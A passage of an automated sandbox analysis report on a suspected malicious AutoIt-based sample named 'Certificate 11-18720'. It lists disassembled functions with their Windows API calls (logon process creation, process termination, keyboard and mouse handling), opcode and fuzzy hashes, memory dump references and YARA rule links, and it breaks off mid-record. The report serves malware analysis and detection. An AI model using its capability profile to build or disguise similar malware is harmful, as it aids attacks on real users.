                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4137160315-0
                                                                                    • Opcode ID: 638279822f24669479b85fc473ce3684120ddc7ece29bfb5941ef6473f068e73
                                                                                    • Instruction ID: 25ad41479cb5e883e6184067843697645b26009cfca6ec1c750f830a6d5732ea
                                                                                    • Opcode Fuzzy Hash: 638279822f24669479b85fc473ce3684120ddc7ece29bfb5941ef6473f068e73
                                                                                    • Instruction Fuzzy Hash: 7131D072608305ABC714DF14DC49F9BBBEAFF89314F04092AF585D7281DA71EA44CBA2
                                                                                    Function 005FAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005FAFAE
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 005FAFB5
                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 005FAFC4
                                                                                    • CloseHandle.KERNEL32(00000004), ref: 005FAFCF
                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 005FAFFE
                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 005FB012
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                    • String ID:
                                                                                    • API String ID: 1413079979-0
                                                                                    • Opcode ID: d311cf68ad7a54d9162167fcf2d904c286c8735cc17c08392911be9d4d9bc7fc
                                                                                    • Instruction ID: 82548df7ddf61f41e6754d9a549d540b9d446a10836f5b577e0861f1e012642f
                                                                                    • Opcode Fuzzy Hash: d311cf68ad7a54d9162167fcf2d904c286c8735cc17c08392911be9d4d9bc7fc
                                                                                    • Instruction Fuzzy Hash: 73215BB650020DAFDF028FA4DD49FAE7FAAFF49704F044015FA05A6161D37A9D21EB62
                                                                                    Function 0062EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 005DAFE3
                                                                                      • Part of subcall function 005DAF83: SelectObject.GDI32(?,00000000), ref: 005DAFF2
                                                                                      • Part of subcall function 005DAF83: BeginPath.GDI32(?), ref: 005DB009
                                                                                      • Part of subcall function 005DAF83: SelectObject.GDI32(?,00000000), ref: 005DB033
                                                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0062EC20
                                                                                    • LineTo.GDI32(00000000,00000003,?), ref: 0062EC34
                                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0062EC42
                                                                                    • LineTo.GDI32(00000000,00000000,?), ref: 0062EC52
                                                                                    • EndPath.GDI32(00000000), ref: 0062EC62
                                                                                    • StrokePath.GDI32(00000000), ref: 0062EC72
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                    • String ID:
                                                                                    • API String ID: 43455801-0
                                                                                    • Opcode ID: c34360d4d94a5026ee2832567fcdb36e5af6cceba814d54f47aa8e76c94f283e
                                                                                    • Instruction ID: 4669b1f53adc58f6f1cf7b0db45a936602c98b9c8df1d9a7871bff0311718e27
                                                                                    • Opcode Fuzzy Hash: c34360d4d94a5026ee2832567fcdb36e5af6cceba814d54f47aa8e76c94f283e
                                                                                    • Instruction Fuzzy Hash: 32111B7640015DBFEF129F90DC88EEA7F6EEF09354F048122BE188A160D7719E95DBA0
                                                                                    Function 005FE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 005FE1C0
                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 005FE1D1
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005FE1D8
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 005FE1E0
                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 005FE1F7
                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 005FE209
                                                                                      • Part of subcall function 005F9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,005F9A05,00000000,00000000,?,005F9DDB), ref: 005FA53A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                    • String ID:
                                                                                    • API String ID: 603618608-0
                                                                                    • Opcode ID: 3daa197966e5ad85f519ec49a32949dfabecdfea2a492d37a8625d3ce572ae6f
                                                                                    • Instruction ID: 9b85ee72efcafda37a27ba914e968071583b86134c5bf0ad1dda4a75688f172e
                                                                                    • Opcode Fuzzy Hash: 3daa197966e5ad85f519ec49a32949dfabecdfea2a492d37a8625d3ce572ae6f
                                                                                    • Instruction Fuzzy Hash: 2F0184B5E00719BFEB109FA68C46F5EBFB9EB49751F004066EE04A7290D6709C00CB60
                                                                                    Function 005E7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __init_pointers.LIBCMT ref: 005E7B47
                                                                                      • Part of subcall function 005E123A: __initp_misc_winsig.LIBCMT ref: 005E125E
                                                                                      • Part of subcall function 005E123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 005E7F51
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 005E7F65
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 005E7F78
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 005E7F8B
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 005E7F9E
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 005E7FB1
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 005E7FC4
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 005E7FD7
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 005E7FEA
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 005E7FFD
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 005E8010
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 005E8023
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 005E8036
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 005E8049
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 005E805C
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 005E806F
                                                                                    • __mtinitlocks.LIBCMT ref: 005E7B4C
                                                                                      • Part of subcall function 005E7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0067AC68,00000FA0,?,?,005E7B51,005E5E77,00676C70,00000014), ref: 005E7E41
                                                                                    • __mtterm.LIBCMT ref: 005E7B55
                                                                                      • Part of subcall function 005E7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,005E7B5A,005E5E77,00676C70,00000014), ref: 005E7D3F
                                                                                      • Part of subcall function 005E7BBD: _free.LIBCMT ref: 005E7D46
                                                                                      • Part of subcall function 005E7BBD: DeleteCriticalSection.KERNEL32(0067AC68,?,?,005E7B5A,005E5E77,00676C70,00000014), ref: 005E7D68
                                                                                    • __calloc_crt.LIBCMT ref: 005E7B7A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005E7BA3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                    • String ID:
                                                                                    • API String ID: 2942034483-0
                                                                                    • Opcode ID: 4dd78aaf7b923d6453c841dce917081b276481c8f3085a99054dd33848caee3c
                                                                                    • Instruction ID: 6bcaf253484cc6c2dd7dd884d3777823c9c220f53c104a9ccc531202e6d11e0d
                                                                                    • Opcode Fuzzy Hash: 4dd78aaf7b923d6453c841dce917081b276481c8f3085a99054dd33848caee3c
                                                                                    • Instruction Fuzzy Hash: 32F0963251D7DB19E72C77777C0AA4B2E8ABF89730B204699F8E4C50D2FF2088424165
                                                                                    Function 005C27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 005C281D
                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 005C2825
                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 005C2830
                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 005C283B
                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 005C2843
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 005C284B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual
                                                                                    • String ID:
                                                                                    • API String ID: 4278518827-0
                                                                                    • Opcode ID: c6e4d42f1bfe56129ea72a423158b6972c0e6601152d4b732bb2c37d86d24d8b
                                                                                    • Instruction ID: 383060b496e81a50821e8f24b9c99c458e58018bbd2bbb09adb8ad167b248c36
                                                                                    • Opcode Fuzzy Hash: c6e4d42f1bfe56129ea72a423158b6972c0e6601152d4b732bb2c37d86d24d8b
                                                                                    • Instruction Fuzzy Hash: 790167B0902B5ABDE3009F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                                    Function 00609AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 1423608774-0
                                                                                    • Opcode ID: 9b9d0a7b3d9e8b4a1e0b03e220e07471159d75f88545be21c4d9bd0c16f70452
                                                                                    • Instruction ID: f242e522a7b7af5db9590d6f3ba93862178c06b5e97b7896f19ecd13f9281c5c
                                                                                    • Opcode Fuzzy Hash: 9b9d0a7b3d9e8b4a1e0b03e220e07471159d75f88545be21c4d9bd0c16f70452
                                                                                    • Instruction Fuzzy Hash: B601A436782211ABD7191B58EC58DEB77ABFF8A701B041529F603921E5DBB49D00DB60
                                                                                    Function 00607BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00607C07
                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00607C1D
                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00607C2C
                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00607C3B
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00607C45
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00607C4C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 839392675-0
                                                                                    • Opcode ID: e84d8d036ab3748f8d03496522df2614da34309de13ca07105d16f553ad6bd5f
                                                                                    • Instruction ID: 1cdef8993de4c13fcb30ff3c1a76dab19e7a00a1c1abaefd22210863f41cf792
                                                                                    • Opcode Fuzzy Hash: e84d8d036ab3748f8d03496522df2614da34309de13ca07105d16f553ad6bd5f
                                                                                    • Instruction Fuzzy Hash: 11F03A7AA42158BBE7215B52AC0EEEF7B7DEFC7B11F000018FA0591191D7A06A41C6B5
                                                                                    Function 00609A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00609A33
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,00635DEE,?,?,?,?,?,005CED63), ref: 00609A44
                                                                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,00635DEE,?,?,?,?,?,005CED63), ref: 00609A51
                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00635DEE,?,?,?,?,?,005CED63), ref: 00609A5E
                                                                                      • Part of subcall function 006093D1: CloseHandle.KERNEL32(?,?,00609A6B,?,?,?,00635DEE,?,?,?,?,?,005CED63), ref: 006093DB
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00609A71
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,00635DEE,?,?,?,?,?,005CED63), ref: 00609A78
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 3495660284-0
                                                                                    • Opcode ID: 5346bfbd38b0db59d33d8ca9e7f7a311bd8127c320bd053f6f2c635aeb5fe979
                                                                                    • Instruction ID: 775da41a9018ba4ffa303f9345e44723b470442a63a401bb889ba2139c2e24d2
                                                                                    • Opcode Fuzzy Hash: 5346bfbd38b0db59d33d8ca9e7f7a311bd8127c320bd053f6f2c635aeb5fe979
                                                                                    • Instruction Fuzzy Hash: FFF0E23AA81201ABD3151FA4EC8CDEF777BFF86301B042025F203910E9CBB59A00DB60
                                                                                    Function 005C1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DF4EA: std::exception::exception.LIBCMT ref: 005DF51E
                                                                                      • Part of subcall function 005DF4EA: __CxxThrowException@8.LIBCMT ref: 005DF533
                                                                                    • __swprintf.LIBCMT ref: 005C1EA6
                                                                                    Strings
                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 005C1D49
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                    • API String ID: 2125237772-557222456
                                                                                    • Opcode ID: b89907728814ec826e56befe00fa2ffa6b5027b1b8971a3aff6360af4e4414ca
                                                                                    • Instruction ID: f4b00c65c7feaa5acd47c20db496f482128f313c65823f3fe22da25775eb2f0e
                                                                                    • Opcode Fuzzy Hash: b89907728814ec826e56befe00fa2ffa6b5027b1b8971a3aff6360af4e4414ca
                                                                                    • Instruction Fuzzy Hash: B2916B715042029FC724EFA4C899E6ABFE9BF85710F04491DF885A72A2DB70ED05CB92
                                                                                    Function 0061AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 0061B006
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 0061B115
                                                                                    • VariantClear.OLEAUT32(?), ref: 0061B298
                                                                                      • Part of subcall function 00609DC5: VariantInit.OLEAUT32(00000000), ref: 00609E05
                                                                                      • Part of subcall function 00609DC5: VariantCopy.OLEAUT32(?,?), ref: 00609E0E
                                                                                      • Part of subcall function 00609DC5: VariantClear.OLEAUT32(?), ref: 00609E1A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                    • API String ID: 4237274167-1221869570
                                                                                    • Opcode ID: 6a13a399f4fb367961d9063f24db1b698bb691ec5fe43a7b252cf0e031398c2c
                                                                                    • Instruction ID: aa36d5a35e41ccde4616e67da00b7555588817ea549965b7e7f1974802c1f17f
                                                                                    • Opcode Fuzzy Hash: 6a13a399f4fb367961d9063f24db1b698bb691ec5fe43a7b252cf0e031398c2c
                                                                                    • Instruction Fuzzy Hash: A7917C706043429FCB10DF64C485AAABBE5BFC9704F08586DF88A8B361DB31E945CB52
                                                                                    Function 00605347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DC6F4: _wcscpy.LIBCMT ref: 005DC717
                                                                                    • _memset.LIBCMT ref: 00605438
                                                                                    • GetMenuItemInfoW.USER32(?), ref: 00605467
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00605513
                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0060553D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                    • String ID: 0
                                                                                    • API String ID: 4152858687-4108050209
                                                                                    • Opcode ID: 5dea20b7dccfee6fce7167f35bcb4560ab24ce3d0ebb638bbf4c003ea9f748a1
                                                                                    • Instruction ID: 883f721c577c98c1ae6d8953428906cf6ce4bc3d2f4035d3e2609a237a551940
                                                                                    • Opcode Fuzzy Hash: 5dea20b7dccfee6fce7167f35bcb4560ab24ce3d0ebb638bbf4c003ea9f748a1
                                                                                    • Instruction Fuzzy Hash: B25101715447019BD71D9B28CC45AEBBBEAEB85314F040A2EF897D32D0EBA0CD458F52
                                                                                    Function 00600213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0060027B
                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006002B1
                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006002C2
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00600344
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                    • String ID: DllGetClassObject
                                                                                    • API String ID: 753597075-1075368562
                                                                                    • Opcode ID: 7922b2ef19dffcc71adf657c2cb250644d6d7c1284dc5fe345675052c3a74766
                                                                                    • Instruction ID: 09eaf3caf065432fc41956954b33846047511ed8c784729e336b68b5687dc9d2
                                                                                    • Opcode Fuzzy Hash: 7922b2ef19dffcc71adf657c2cb250644d6d7c1284dc5fe345675052c3a74766
